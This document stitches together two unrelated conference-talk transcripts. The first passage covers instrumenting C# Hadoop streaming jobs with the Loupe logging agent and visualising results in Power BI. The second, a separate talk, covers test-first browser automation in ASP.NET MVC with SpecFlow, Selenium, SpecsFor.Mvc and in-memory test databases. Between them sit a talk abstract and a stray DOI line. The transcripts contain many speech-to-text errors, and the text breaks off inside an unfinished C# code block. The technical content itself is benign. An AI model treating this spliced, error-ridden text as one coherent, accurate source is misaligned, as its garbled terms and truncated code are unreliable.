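As a rough idea of what an instrumented streaming mapper looks like, here is a minimal sketch. It is a reconstruction rather than the demo code, and the Loupe agent calls (Log.StartSession, Log.Warning, Log.RecordException, Log.EndSession) are written from memory, so check the exact signatures against the current Gibraltar.Agent package before relying on them:

```csharp
using System;
using Gibraltar.Agent;   // the Loupe agent NuGet package

public class WordCountMapper
{
    public static void Main(string[] args)
    {
        // Start a Loupe session as soon as the map task spins up.
        // Each node writes to its own local log file, so this is cheap.
        Log.StartSession();

        try
        {
            string line;
            while ((line = Console.ReadLine()) != null)
            {
                var fields = line.Split('\t');
                if (fields.Length < 2)
                {
                    // Not a coding exception: just an input line that doesn't
                    // match the expected format. Log it so it can be found later.
                    Log.Warning("Mapper", "Malformed input line",
                                "Expected at least two tab-separated fields: {0}", line);
                    continue;
                }

                foreach (var word in fields[1].Split(' '))
                    Console.WriteLine("{0}\t1", word);
            }
        }
        catch (Exception ex)
        {
            // Real exceptions get recorded with full context for the Loupe viewer.
            Log.RecordException(ex, "Mapper", true);
        }
        finally
        {
            // Nothing leaves the node until here; EndSession flushes the local,
            // compressed log and, in production, pushes it to the central server.
            Log.EndSession();
        }
    }
}
```

The key property is the one described above: during the job everything stays on the node's local disk, and only the end-of-session call produces any network traffic.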
So what kind of information can you actually pull out of that? If we open the Loupe viewer, we've got our Hadoop demo, that piece of code which actually ran, and here we can see everything which was logged while that job was running. If we open our reducer and have a look, here are all of the things that it pushed out; it said the total number of words was four, and so on. All of that kind of thing is really useful. If we close that down and look at the mapper, you can see we've got an actual exception in there. If we open that up, everything is the same: we can see the actual exception, click on it and get the details, where it was reported and what kind of exception it was, and we can look at the exception itself and which function it actually happened in. We close this down, and then we move on to the session details. There we can see all kinds of things about the machine that generated this exception: its OS architecture, the .NET version it was running, the culture it was running in, when this started, when it ended, all that kind of stuff that you want to instrument, captured just the same as you do now. You can use this product for your own desktop and server software that you're writing today, and when you move that software up onto Hadoop you can continue to use this kind of instrumentation. It's extremely powerful, and again, everything that I've shown you right now is completely free; it's only if you want to use Gibraltar's servers that you actually have to pay them any money. So let's close this down and head back to our slides. You can use it for any distributed system, basically; it's .NET instrumentation, so if you've got any kind of cluster, any kind of distributed architecture that's running on .NET, you can use this product, and because it's very well designed it will work in a performant manner: it has the ability to write locally in a very compressed form and then push it out to the server when you're finished. For the benefit of the camera, the question there was whether Loupe can work with other kinds of distributed architecture or just with Hadoop, and the answer is: anywhere that runs .NET, you can run Loupe. So that is pretty much it, and we've even got five minutes for questions. Just to recap what I explained today: this is a kickstarter to get you Microsoft developers up and running on Hadoop. I explained what the problem was, and the problem is one of input totally swamping a single machine. We fix that with MapReduce: we break our algorithm down, divide and conquer, into a map and a reduce, and we push that out onto a cluster. But that gives us other problems, because we then need all that cluster management and we become responsible for it. Hadoop comes along and, as a framework, does all that heavy lifting for us, and now we're back to just concentrating on our code. I then showed you how to get your C# code running: you can use either the streaming API
straight from the command line or you can use the Azure SDK once we've got our code running I then showed you how to use visualization okay the visualization tool that we used here was just Power BI in Excel because that's the one you're probably most familiar with using Excel's and visualization tool there are lots of other ones out there feel free to pick the one that that you want but remember when you're connecting to an Hadoop cluster and you're bringing that file down that file might be a gigabyte in size okay so you need something like power query and the power BI tools within Excel which can handle large file size with a very cool in memory system okay and then once we've finished with the visualization the last thing I showed you was how to instrument your code because that's important to dotnet developers but in developers as a whole you know what is my code actually doing on the cluster okay because I showed you that you can test it locally using the GNU tools for Windows you can test that locally but you're only probably going to take a head 100 and run it with 100 lines and it might run perfectly when you're using it with two or three terabytes up on the cloud you might run into problems okay well try finding those problem lines in the terabyte of code a terabyte of file that you're looking at okay when each of the nodes it's easy for each of the nodes to find because they're looking at a 64 megabyte slice that's where you want it to tell you about the broken lines right not to give you a terabyte of file and say hey find it yourself best of luck okay and so you want to instrument your code and I've shown you that one of the best tools for doing that is loop from Gibraltar software most importantly everything that I showed you is completely free okay just as an aside I don't actually work for Gibraltar software I don't get any money for this but you only actually have to pay them if you put it into production and that's everything that we covered so after that quick summary does anybody have any questions now for the last three minutes yes sir okay so the question there was does Hadoop do anything other than MapReduce and the question is yes and no okay which is a weird answer but this is how I'm going to explain it to you Hadoop is an environment it's a framework for running MapReduce jobs okay so anything that under the hood clever developers can compile down to a set of MapReduce jobs okay can run on Hadoop okay so if they abstract things away from you away from that so that they present an abstraction to you in a different abstraction but it's still MapReduce underneath then that can run on Hadoop so for example there are products like Hive for example that will that are actually an SQL abstraction over MapReduce so you get presented with something that looks like a bunch of relationally joined tables you actually communicate with those tables instead of writing C-sharp code you actually write Hive SQL which looks very similar to T-SQL and any other SQL you've ever written in your life before under the hood the very clever developers basically compare that down into a set of MapReduce jobs so the answer to the question is yes Hadoop can only do MapReduce however clever developers can make layers upon layers of abstraction that hide that stuff and there's a whole load of stuff out there that will run on Hadoop anybody else yes sir yeah okay so the question there is when we're creating nodes how do we do that is do do we have to specify is it dynamic and the answer to that 
question is: you're responsible for telling the name node about all of the nodes in the cluster. There are plans within Hadoop to make setting up new nodes easier, but there are also tools, again going back to what this gentleman asked previously about what else you can run on Hadoop, and one of the tools out there is called Ambari. It's a provisioning system, so it will help you provision those nodes, and it will also monitor the health of the nodes and all the rest of it. So it is your responsibility, but there are great tools out there to make it super easy for you. I'm about out of time now, so thanks very much for coming to the session and listening. I hope you enjoyed it and that you got the kickstarter that can help you get out there and do your own Hadoop work. I've been asked to remind you to please provide feedback on your way out by means of the cards; it's really helpful for us speakers to get feedback on our performance, what you liked and what you didn't, and it's also very important for the conference, because that lets them decide whether or not to invite me back. If anybody has any other questions, please just come up while I'm packing up and I'll answer them then, or I'll be around for the rest of the conference. Thanks very much for coming along.
|
This session will provide a kickstarter for Hadoop on the Microsoft platform. It will take the audience from installation, through upload of data and analysis, to visualisation of results via Power BI. It's a must for any developer who is interested in finding out how the data science/big data wave is going to impact them and what skills are needed to work in this market.
|
10.5446/50804 (DOI)
|
Hello? Yeah. Okay. So let's get started. Hello, everyone. I hope you enjoyed the MDC so far. It's Friday before lunch, so I know it's a little bit harder to grab your attention, but I will try. Today I will talk about that application testing in the.NET space, and this talk is mainly based on the experience we have gathered at my company Tech Talk in the last few years, so all the results are also credited to my great colleagues. And yeah, let's jump into that. Actually, I have started the spec flow project a couple of years ago. How many of you know about spec flow? Okay, so almost everyone. Yeah, so spec flow seems to be a little bit silent now, but this is because right now we are mainly working on something called spec flow plus, which is a set of extensions, a useful tools like our test runner on top of spec flow. And even though that spec flow plus is a kind of commercial package, our goal with that is to use it as a base for continuing maintaining the spec flow project. So if you happen to purchase spec flow plus, then you actually get double bonus because you get some good tools and you also support the open source project with that. This talk will not be directly related to spec flow, but spec flow is related to test automation and test out and web applications, test automation in web applications is related to what I'm talking. So there is a connection between these two, even though this will be not as direct as you could be. So have you ever test automation or web automation through browser? Yeah, almost everyone. So you know this sometimes heated discussion that you have to, whether you should automate your applications through the browser or through the controller or something like that. And I think these discussions are good and I like to do that. Actually, we are doing that almost before every project. But I think there is no ultimate answer for that. So the thing I have realized that this is something like the heating system in your house. So you can turn it up and it will be nice warm. Probably you will pay a lot or you can turn it fully down, but then you will not pay anything, but you will be probably freezing after a while, especially here in Oslo. So this is also something similar with the web applications as well. So you can do test automation in the, through the browser, including JavaScript and everything. This will be costly. Coastly because there will be a higher implementation cost of your automation layer, but also there will be a higher maintenance cost related to this automation layer. But this is not necessarily bad. The question is whether the value that is provided by this automation is good enough to judge the costs. On the other hand, of course, in the full other extreme, this would be fully senseless because you are actually not testing what your application is doing. So this is a discussion and a decision that you have to make in every project. We are also doing this every time. Right now it's around 50-50, so half of our projects we are automating through the controller, half of them through the browser. However, what we are doing recently is that we are not making this decision fully uniform for the entire project. Maybe there are some components that make better sense to automate through the controller, even even more layers below, like a calculation part of your application. Maybe there are some parts which are related to user interaction, which makes more sense to automate through the browser. 
Actually, if you are phrasing and you are describing your test well and not including these technical details into your test descriptions, then this is absolutely possible and this is working quite well. So this is something that we are using quite often. While preparing for this talk, I was trying to grab some data from the Google Trends. Google Trends is a service where you can measure some kind of popularity of different search terms. In my case, I was collecting some tools and techniques related to browser automation. And this is showing that these trends in the last six years, I think. And what you can see is that these lines are waving. So something that was maybe popular five years ago. Now, it's not that much popular. Something that was not even existing a few years ago now becomes very popular. So this is also showing the dynamics, the changing environment of this browser automation business. The other thing that you can see from these trends is there are these blue and the purple line on the right-hand side, which is the web driver and the Fontome GS. And these two guys seem to have a quite deep curve up. So these two guys are something that we have to definitely watch for. Okay. So as I said, the dynamics and the environment, so the environment of this test automation and this entire browser automation topic is a little bit problematic because this is like a moving target. So it's very hard to find and make a decision which is last longer than a year. Actually, the web technology is quite in a rapid change. So with HTML5, with REST, JSON, whatever else, this is something new that we have to change as developers or test automators. We have to change our strategy to match that. Web applications are also changing. So, or the requirements for the web applications are also changing. I think you all know this. And also the web automation is changing. So a couple of years ago, it was very hard to get the browser automated. Now it's better and better. I guess everyone knows the web driver interface. Who knows the web driver interface? So what is that? Yeah. So web drive interface is now WC3 standard or at least the draft of the standard. So you can go to the, you can search for it and you will find the draft on the WC3 website. And this also shows that browser automation is becoming a topic that is well and well accepted. Or you can just think about the, the, this mini IDEs that are now we have in the browsers with the F12 and so on. So this is something that making our life better and better, but still very hard because it's still moving. In.NET, it's even worse. So unlike the, maybe some other platforms, in.NET we have this problem that the ASP.NET core, at least not the Vnext, but the current ASP.NET core is very tightly coupled to IAS. I think you, if you have tried to do more browser automation then you know that. So this doesn't look like a very big problem from the beginning, but actually if you want to make advanced and efficient web automation, then this becomes a problem. Because every testing that you have to do is a kind of out of process testing or out of processing. And this is causing some extra force that you have to take care of. We'll come back to this topic later. Fortunately ASP.NET Vnext is on the way. So this is a very good direction and I'm very happy that Microsoft did this step. So let's watch for that. Okay. So what will be the topics for today? Actually first I will discuss a little bit how you can do test first development through browser automation. 
I'm very much addicted to test first. I'm doing BDD quite much in the last years. And I start, I better and better love how test first works and how this can be integrated into the development cycle. However, doing test first with browser automation is not that trivial. So we'll see a little bit how this could be done. In the second part, we will discuss some issues that are coming from this outprop nature or this IS bound nature of the ASP.NET framework. I will show what kind of solutions we came to when we were trying to address these problems. Through this talk, I will try to mention all many different tools and resources that we have used or I find useful. At the end, there will be slides with all of them listed together with links. So you don't have to very well make notes about that. As a scope, I will pick a classic ASP.NET business application. Classic means that it's not a single-page application. This is the majority of the applications that at least the tech talk we are doing. And this is what I would like to focus in this talk. And of course, through some kind of functional test approach like BDD or ATDD or something like that. And at this point, I want to show how the application that we will implement looks like. Actually, it's a small Q&A application which is reminding very much to another Q&A site. But this is called spec overflow. I was playing with it as a spec flow test. But it works pretty similar. So you can ask a question and it appears in the website. Otherwise, it's just a simple ASP.NET application will be perfect for us to show the different options for that. Good. So let's jump into this test first part. And let's see how this can be done. If you do ATDD, then you probably have seen this circle or this flow hall test first first with acceptance test-driven development. How many of you have seen this picture already? Yeah, quite many. So the general flow is the following. You are just creating a failing end-to-end test, failing acceptance test, however you call it. And you start working on that until it gets green or gets passed. While you are working on that, you have to implement different layers in an outsidey matter. So first UI, then the controller and whatever, just go deeply into your application where there are some iterations with TDD or with just some other iterations. And this is the way how you at the end get to the testing end-to-end test. Then just like in TDD, there is a good time to review what you've done and do a refactoring step and then you can move forward. But of course, you can in the meanwhile have some deployable version of your application. So this is what we would like to do and this is what we would like to do together with browser automation. So let's not try to integrate the entire UI into our development lifecycle. Okay, why is this good for us? So why do we want to do our test-first development through with browser automation? On one hand, because I love test-first, but on the other hand, there are more stronger arguments as well. First of all, this is providing the real outside-in approach. How many of you have heard about feature injection? Only a few. Yeah, feature injection and outside-in approach is basically a way how you develop your application starting from the user's lead and go deeper and deeper in your application. 
With this outside-in approach, you can basically ensure that you really just implement what is really required at the end for the user on one hand and that you are implementing it in a way that is comfortable for consuming by your users. If you skip the UI and the browser aspect of your application and it can happen that you implement something even in the control layer, that will be not used or not used in a way how it's comfortable for consuming it from the web page. So this is a danger which you can avoid if you do test-first through the UI automation. The second is that it's a little bit related to the modern web applications where HTML5, five semantic markup and so on. If you think about this a little bit more in detail, then you will see that the HTML code is not as much part of your design anymore, but it's more part of your domain. So you have some structured semantic elements inside your HTML. You have some well-thought ID, class names and so on inside your HTML. The CSS is doing the design part for that, but the HTML part contains a lot of domain terms and parts of your... It can be, in fact, part of your domain model. However, if you develop this HTML part somehow separately from your application in the control layer, then it can happen that you are just basically building up two different worlds, two different terms, two different domain models. If it's good, then it's matching, but if not, then there is a gap which is causing some problems with that. If you do outside-in, then the flow is much more natural, so you don't have this problem that you are building up two different worlds that might be inconsistent. And of course, it's a kind of indirect argument, but if you do test first with browser automation that you are forcing yourself to establish a model that is fast enough. If you spend, I don't know, 15 seconds to run a test because you are just having some very complicated IS setup and browser execution and whatever, then you will not be able to do test first. So it's somehow forcing you to think about performance from the beginning in terms of the development workflow. So this is how this could be done. Okay, so far for the introduction, let's jump into the demo part. And in the first part, I would like to show you, give you a little bit of impression how these test first could be working with browser automation. And for that, I will see three different approaches and try to compare them. And the first approach is not the browser automation, it's a classic control-level testing. I will use this as a benchmark to compare the others with that. And the other will be pure Selenium web driver implementation. So no additional tools or frameworks on top of that, but just the pure Selenium web driver API course. And let's see how this can, and at the end, I will have a third one somewhere in between, but let's pick these two first. And for that, I will implement a new scenario inside our application, which is, let's say that we want to show some trends page where we want to show the tags attached to the different fashions ordered by the popularity. Okay, so this would be a spectral scenario that is related to that. So show a popular tags. I have some questions with some tags attached. And if I go to the trends page, then these are the tags that are displayed in this order. So this is the exercise that we want. This is the feature that we want to do with the different automation models using test first. 
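The Gherkin text of that scenario isn't readable in this recording, so the step wording below is a guess at it, but the shape of the SpecFlow bindings behind such a scenario is standard. TestDatabase and TrendsPageDriver are hypothetical helpers standing in for whichever automation variant (controller, Selenium, or a wrapper) gets plugged in behind the steps:

```csharp
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
using TechTalk.SpecFlow;

[Binding]
public class PopularTagsSteps
{
    private IList<string> _displayedTags;

    [Given(@"the following questions with tags")]
    public void GivenTheFollowingQuestionsWithTags(Table questions)
    {
        // Arrange: put the sample questions (and their tags) into the test database.
        foreach (var row in questions.Rows)
            TestDatabase.AddQuestion(row["Title"], row["Tags"]);
    }

    [When(@"I go to the trends page")]
    public void WhenIGoToTheTrendsPage()
    {
        // This is the step whose implementation the three demos vary.
        _displayedTags = TrendsPageDriver.GetDisplayedTags();
    }

    [Then(@"the tags are displayed in this order")]
    public void ThenTheTagsAreDisplayedInThisOrder(Table expected)
    {
        // Order matters: the tags must come back sorted by popularity.
        CollectionAssert.AreEqual(
            expected.Rows.Select(r => r["Tag"]).ToList(),
            _displayedTags);
    }
}
```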
Now, to save some time, I have pre-recorded these implementations because now I can play it in a little bit triple speed, I think, because otherwise it would be too slow. But my goal is not to show you how to type, but it's more to show you how the, what is the impression, how it feels to do test first development through the UI. Okay, so the first one will be this controller, which is not even web development at all, web automation at all. And what you can see is that I have just a simple test class and the test method inside. Right now, for the sake of simplicity, I will implement this automation in a single test method and not through spec flow, because then you will see it's a little bit more condense and it will be easier to explain through this demo. In reality, I usually do this in spec flow step definitions. So what you see here is just an empty test and let's get started. So the first thing that I usually do is, if I able to start it, yeah. Somehow fix the video. Okay. Whatever. So the first thing that I usually do is I'm making a to-do list, so I'm just planning what I will do inside this test. So in this case, I decided it's not well visible, but what I decided is that I will just invoke the test control, transcontroller.index. Now I will just grab the actual text from the model data and I will do the assertions for that. And when I'm ready, I have a failing test, then it starts to implement these things. Data preparation I have already done. Now I have started to create a new transcontroller, it's an empty transcontroller with an empty index action. This is pretty much what you usually do if you do TDD. Then you are trying to access the model. The action is still empty, so this will probably not give us anything just now. So probably we would have a narrative exception when I execute this test. Then I just realized that I need a list of tags somewhere inside. Then I move forward and I realized that I need to have three tags, so I start to implement some logic which is just splitting out the tags. And when I move forward, I'm just having more and more implementation for that. So this is basically the way how you can do control automation testing before. So let's see how this looks if you try to do Selenium automation or Web browser automation instead. Again, I have some to-do lists of what I will do and it's pretty much similar what we have with the control automation but also different. So instead of calling just the index action on the transcontroller, right now I'm navigating to the trans page. And instead of grabbing the data from the model result, I just parse the HTML to get back the list and then I have the assertions afterwards. So let's try to see this how it works. I will again not play it fully through but just to have you get your impressions. So first I somehow ensure that I can start the browser and I implemented in the setup call and then I navigate to the URL with the Web driver, navigate, go to URL method and then finally I realized that for that I need to make an assertion for example how the title is called, then this assertion fails because I'm not sure because we just have a yellow screen right now. Then I implement the empty controller. This will again just provide us yellow screen because there are no view yet. Then I implement the view. Then it passes so I can move forward. I'm just trying to grab the data from the page. Now this is the time when I start to think that, okay, how is the control will be called which will hold the text. 
I just realized, okay, I want to have some element which is having the ID called tags. So I started to think about how the domain will work of this particular page. I have nothing implemented in the controller yet. Then when I try to grab the text from this list, I have to think about how do I get the list type, how do I get the individual text from the page. So how my page will be structured. And I just move forward and then I will realize that to actually get the labels of the text and the numbers, I have to have some more glen rule markup inside my HTML to fulfill that and so on and so forth. And once I have that, so once I have a really get to the point where I need to implement something in the code, I already have some imagination how the page model will look like because I already know what is required from the end users when they want to see the page. And it will be much more straightforward to implement the controller and the action method for that. Okay. So this is just to give you some impression how it feels. So it really starts from the UI and then goes in more into the controller and implementation. There are some things in the mean by in Bitveen as well. How many of you have heard about KoiPoo? Not too many. Okay. How many of you have heard about Kappibara in Ruby space? A few of you. Yeah. So Kappibara, so KoiPoo is basically the dotnet port of Kappibara and all these tools are others as well. All these tools are responsible. All these tools are trying to give you a nicer API on top of Selenium. So you have seen that making a URL, making a navigate to methods was quite complicated in Selenium. We have to go to navigate, go to whatever full URL. If you want to click a button that is also in Selenium or in the web drive interface is several different calls, these tools like KoiPoo is trying to give you a nice usable fluent interface on top of the Selenium web driver. I think it's pretty good. But I will not pick that. The other thing that we are also using quite often is the page objects. How many of you are using page objects or the page object pattern? Yes, some of you. The page object pattern is also very good way to automate pages. It's a different approach from KoiPoo because KoiPoo is trying to simplify the user interaction. On the other hand, page objects are giving you a way to declaratively describe how your page will look like. On one hand, this will help you to implement the page and on the other hand, it will help you to automate the page. So this is another approach that we are using quite often. However, here we are having ASP.NET MVC applications and these MVC applications have a lot of different conventions that they are using. For example, the URL is coming from a convention or if you are using the editor form helper method that is creating you an input with the ID named after the property you have and so on. So the question is why can't we use these conventions also when we are trying to automate the UI? And actually, when we realized it, we have also started to implement some small interface on top of Selenium where we could express the browser automation terms like getting back an input or going to URL with Selenium but in a way that is using the ASP.NET MVC conventions and the, for example, the routing, the model binding and so on. So the tests are becoming more clear and it will be much more easy to make any refactoring afterwards. 
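To make the two recorded demos above concrete, here is roughly where each variant ends up. This is a reconstruction, not the recorded code: TrendsController, a page model with a tag list and an element with the id "tags" follow the description above, while the URL, the expected values and the model type name are illustrative:

```csharp
using System.Linq;
using System.Web.Mvc;
using NUnit.Framework;
using OpenQA.Selenium;
using OpenQA.Selenium.Firefox;

[TestFixture]
public class ShowPopularTagsTests
{
    // Variant 1: controller-level test. Fast, but it never sees the HTML.
    [Test]
    public void Index_returns_tags_ordered_by_popularity()
    {
        var result = (ViewResult)new TrendsController().Index();
        var model = (TrendsPageModel)result.Model;

        Assert.That(model.Tags, Is.EqualTo(new[] { "c#", "specflow", "selenium" }));
    }

    // Variant 2: raw Selenium WebDriver. Drives the running site end to end.
    [Test]
    public void Trends_page_lists_tags_ordered_by_popularity()
    {
        using (IWebDriver driver = new FirefoxDriver())
        {
            driver.Navigate().GoToUrl("http://localhost:12345/Trends");
            Assert.That(driver.Title, Is.EqualTo("Trends"));

            var tags = driver.FindElement(By.Id("tags"))
                             .FindElements(By.TagName("li"))
                             .Select(li => li.Text)
                             .ToList();

            Assert.That(tags, Is.EqualTo(new[] { "c# (3)", "specflow (2)", "selenium (1)" }));
        }
    }
}
```

The difference in ceremony between the two is exactly the gap that the convention-based wrappers described above try to close.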
However, recently I figured out that there is a better tool than the one which we have implemented for our own so I would rather show this one. It's called specs for MVC and I'm pretty sure that there are other tools as well so but I think this is a good example for showing that. To give you an impression how specs for MVC works, specs for MVC is also just something on top of Selenium web drivers so if you have a Selenium web drive implementation specs for MVC will work with that so it doesn't build up yet another automation infrastructure. However, in specs for MVC, things like this navigate statement which was looking like this in a classic Selenium can be expressed in a way like app.navigate to home controller.index. So basically you were able, I was able to use my class names and metal names to be able to do browser automation. This is the way, of course you can always step back and do low level Selenium automation as well so it doesn't hide you or close you out of that but the simple things that are, that having matching terms in the MVC world are easier to handle. So let's see how this works with test first way. So again I will have a, oops, I will have a to-do list what I'm going to do. Doesn't matter, it has already started. So basically I navigate to the page but since specs for MVC giving me this tied interface even without navigating to the page I have a chance to think about how my controller has and how my actions will be called afterwards. Then I will do the same type, title assertions that I, assertions that I did with the Selenium case so I asserted that the title should be called trends and of course this will fail because I just have a yellow screen so I need to implement some simple view for this, for this, for this page and set up the title and this will pass and I can move forward. And the next thing which is interesting will be when I try to grab the list of page, the list of text from the end result page. Here again specs for MVC gives me a helper method called find display for and display for. I just wait until it's finished, yeah, just zoom in. So what it does basically is using again the conventions of MVC and basically I had the chance to start thinking about how my page model will look like. So I just decided that, okay, I will have a page model like trans-page model and inside the trans-page model probably I need the list of text because I need to display that. So I just expressed the access for this named URL list through the domain model terms that I will implement. And if I go forward then of course I can implement my page model and add the text property and so on and so forth. So this is again just giving you an impression how the flow works. So even though that I'm doing browser automation here I'm just somehow forced to think about my full domain model together with the HTML and the back-end model. So it's much more, much more, there will be much less gaps between the HTML model I use and the domain model in the back-end. So in the download side of this talk you will be able to download these videos and you can watch them through fully. Interestingly, with the three different techniques not exactly the same implementation came out as a result. Of course they were not too much different but they were slightly different and it's quite interesting. And this is a small summary page for this result and the top is not visible but it doesn't matter. And this is how you can analyze the differences between the three different models. 
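Condensed into a single test, the SpecsFor.Mvc version of the same check looks roughly like this. The calls are written the way they come across in the recording (strongly typed NavigateTo, then dropping to the underlying Selenium browser for the list), so treat the exact member names, including the Browser property, as assumptions to verify against the SpecsFor.Mvc documentation; the host setup that starts IIS Express is omitted:

```csharp
using System.Linq;
using NUnit.Framework;
using OpenQA.Selenium;
using SpecsFor.Mvc;

[TestFixture]
public class TrendsPageSpecs
{
    // SpecsFor.Mvc hosts the site once per test run via its integration host
    // (configured elsewhere); each test class then just grabs the running app.
    private readonly MvcWebApp _app = new MvcWebApp();

    [Test]
    public void Trends_page_lists_tags_by_popularity()
    {
        // Strongly typed navigation: the URL comes from MVC routing, so renaming
        // the controller or action stays refactoring-safe.
        _app.NavigateTo<TrendsController>(c => c.Index());

        // For reading the rendered list we fall back to the underlying
        // Selenium driver (assumed here to be exposed as _app.Browser).
        var tags = _app.Browser.FindElement(By.Id("tags"))
                       .FindElements(By.TagName("li"))
                       .Select(li => li.Text)
                       .ToList();

        Assert.That(tags, Is.EqualTo(new[] { "c# (3)", "specflow (2)", "selenium (1)" }));
    }
}
```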
So I'm just put next to each other the different ways how you can express the same things with the different automation techniques. And what you can see from here is that by using the spec for MVC or any other MVC-based framework on top of Selenium you can express very similarly the things how you could do in a control level. So it's much easier to write this as you don't have to deal with the string literals and stuff in that. Also to access the page model it's quite easy. And as you can see you can always switch back to the Selenium web driver interface if you need or there is no real matching for that in the MVC terms. Of course, analyzing the web testing strategy, for analyzing the web testing strategy this is probably too easy example. So usually I'm doing at least three examples. One is a read-only case like this one was. I also do an edit case so filling out a form and successfully submitting it. And maybe it was a case where you are just submitting the form but there is some validation error or either business or any other input validation error. I think if you at least do these three or you just pick a few other important use case from your application then you can have a quite good feeling how the different techniques would fit to you or to your project. And then you can make some kind of summary out of that. My wife is always marking the cooking recipes with one to three hearts depending on how much we liked it. So I just borrow this pattern from her and I was trying to make my own fully subjective results for that. I think there are not too much interest, not too much extraordinary things in that. Maybe the only interesting thing is this good design. By the way, these different aspects are the things that you should think about when you are analyzing any of the strategy that you come into. How much it helps you to make good design? How much it helps you to make a clean test? How much it helps you to keep to make a clean HTML? And how much, how stable it is and how much it is? So maybe the only interesting things is the good design where the control lever just got one heart which you might argue with. But actually this is coming from the fact that it's not doing full outside in. So actually, even if you are doing something in the control lever, you might want to end up, might end up with something which is not convenient or not exactly fitting to the user's needs. Cool. So this is how this test first is at least can be analyzed when you do, when you do browser automation. The next thing is this outprog versus improg testing thing. And here there is the other heated discussion where you're mocking or subbing is good or bad in terms of test automation. So how much you can cheat and how much you cannot cheat? And of course there are some cases where you, it's simply not possible to test something in a full integration if you have some complicated auto-attegationable or email sending or whatever else or time dependency. Now you have, if you want to make an automated test for that, you have to mock it out or stub it out. However, in some other cases, you also might want to consider using the mocks or stubs in a case, for the case of improving the testing efficiency. I think testing efficiency is very much, very important concept and you have to always keep in mind, especially in the beginning, why you have a chance to change the things. So, and I think it's completely valid to make the mocks or stubs even for improving the testing efficiency. 
But of course you have to always consider what are the consequences for that. So as an example, I will try to show you how you can use in-memory database for testing. I think testing with in-memory database is quite a popular way to speed up your test, especially if it's a data-intensive test. So let's try to do that. In-memory testing can be done very well with SQLite and in some sort also with SQL-CE it's almost in-memory. However, in my case, I will just have a very dummy implementation of my entity framework dataset. So I will just replace that to show this in my tests. Fortunately, I have autofoc already configured for my test and right now as you can see as I spec over flow entities interface, which is the interface of the DB context, I have registered my entity framework DB context here and I can just change this to use in-memory, the in-memory version for that. So this is how I will show you how this could work. And for that, I will show you two different tests. One is this classic controller test. I'm just running it. And let's see some basic Selenium tests for that. This test are just testing the website in a way that given there are some questions on the database, if I go to the home page, then I should see these questions on the home page. So let's run this Selenium one as well. This is not yet the in-memory database, so just to make sure that it works. It pops up Firefox and it runs pretty slow. It's eight seconds, but okay right now. And let's try to speed it up and let's try to make it in-memory. Now, if I just change the dependencies and recompile, let's run the controller test, which should silver fine instead of three seconds now we have two. Of course, this application right now doesn't have too much data. But if I try to run the Selenium test, then what do you think what will happen? Here you can already spot it out from the Firefox screen that actually it was empty. And actually we get an exception that we expected two or three questions, two questions to be listed on the web page, but actually we got only zero. We got nothing on the web page. What happens? To understand that, you have to understand a little bit how the process model works in our testing environment. So right now in the input testing, we had the test process, so the end-unit, run-er, whatever you use. And basically you had the test in there and it was just making an instances of the application. The application was accessing the database. You could make, you could grab the results, make some assertions on that, and so on. Then when we were changing the implementation to some mock implementation, and this small explosion mark means a mock or a stub in the application. So basically we have introduced the in-memory implementation of our database access layer, and both the test and the application was going through this in-memory implementation layer. That's why it was working. Of course, if you have this situation, you cannot only just mock out the database, but you can do any other tricks with your application. You can replace any other dependencies or inject something on that. And so you have full control of that because you have shared memory and you have full access to your applications stack. However, in the browser testing, what happened, we were just going through the browser and the browser was accessing our application which was sitting inside the IS or IS Express. Until we were doing the automations through the database, this was all fine because our tests were accessing the database directly. 
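For reference, the container swap just mentioned is a one-line change. Here is a minimal sketch, assuming the DbContext interface is called ISpecOverflowEntities as in the demo and using InMemorySpecOverflowEntities as a hypothetical fake backed by in-memory collections:

```csharp
using Autofac;

public static class TestContainer
{
    public static IContainer Build(bool useInMemoryDatabase)
    {
        var builder = new ContainerBuilder();

        if (useInMemoryDatabase)
        {
            // Fake context backed by in-memory lists: fast, but it only exists
            // inside the process that created it.
            builder.RegisterType<InMemorySpecOverflowEntities>()
                   .As<ISpecOverflowEntities>()
                   .SingleInstance();
        }
        else
        {
            // The real Entity Framework context talking to SQL Server.
            builder.RegisterType<SpecOverflowEntities>()
                   .As<ISpecOverflowEntities>()
                   .InstancePerLifetimeScope();
        }

        return builder.Build();
    }
}
```

With the real context, the test process and IIS both talk to the same SQL Server; with the fake, each process ends up holding its own private copy, which is exactly the problem described next.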
So they were inserting those records directly into the database. However, when we have introduced the in-memory database, when we executed the tests, since these were running in a different process and different app domain, actually we had another copy of that in-memory database. And since these two processes are not sharing the memory at all, actually we had two in-memory databases in our hand. And therefore, even though the test process has inserted two records in this copy of the in-memory database, the IS was not seeing that, so that's why our test was failing. Okay, is this clear? Good. So it's just a simple concept that it's a simple idea, let's switch to in-memory database because everyone is talking about that. But if you try to apply it into a browser automation scenario, this becomes pretty hard. And of course, if you have other things like complex mocking or stubbing scenarios, you might have the same problem as well. So what we can do about that. So what would be the great thing, but this is unfortunately just a wish, is actually to not have this IS at all, but just run our application inside our test process. Just like with the in-proc scenario, just we can go through the browser, that's not a problem. But I want to have my application hosted in the same process like we are, because then we can do the same mocking and stubbing that we want. And this in-memory, for example, is in-memory database scenario would work. Well, actually, this is, in some cases, this is possible. So for the infrastructures that are already using OVN, OVN is a general standard for hosting web applications. And for example, Web API or Nancy or Vnext will use this. This is already possible. So you can try to host your application inside your testing process, at least in some sense. However, for example, for ASP.MVC, this is not possible yet. So this is still just a wish. So how could we just some, how work around it? By the way, if I would have the same test process that I could even include the browser as well and have some fully in-memory, in-proc browser, which would make it super fast. So how could we solve that? And one very crazy idea, which I would never use in production, but just to show you how these things can be implemented is to try to put your tests inside the application. So instead of moving the application into your test, let's try to move the test into the, into the, into the IS process. This is a little bit similar to how you do browser or how you do mobile device automation. There are some, something that is deployed together with your application to the device to be able to do testing. And actually, this sounds crazy, but it's not that complicated. So what I did, I just implemented a small ASP.MVC controller. I call it integration test controller. And this, what this integration test controller does, it is just actually calling the end-unit runner runtime. It's a.NET stuff, so you can just load it into the memory and run it. And just run the tests which are provided as a class name to your input. So to test this, I can just take the sample URL, where I've just specified this Selenium beta. So the tests that were failing here. And let's try to run this in the, in the browser instead. So I'm just pasting this URL. And hopefully, if it works, yeah, okay. Then what you can see is actually, end-unit was running inside my, my web application. And it was running my tests. And it was passing. 
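The controller behind that trick only needs a few lines. The recording doesn't show which NUnit runner API is being called, so the sketch below uses NUnitLite's AutoRun as one possible way to do it; the route, the assembly name and the response format are all made up, and, as the speaker says, this is a thought experiment rather than something to ship:

```csharp
using System.Reflection;
using System.Web.Mvc;
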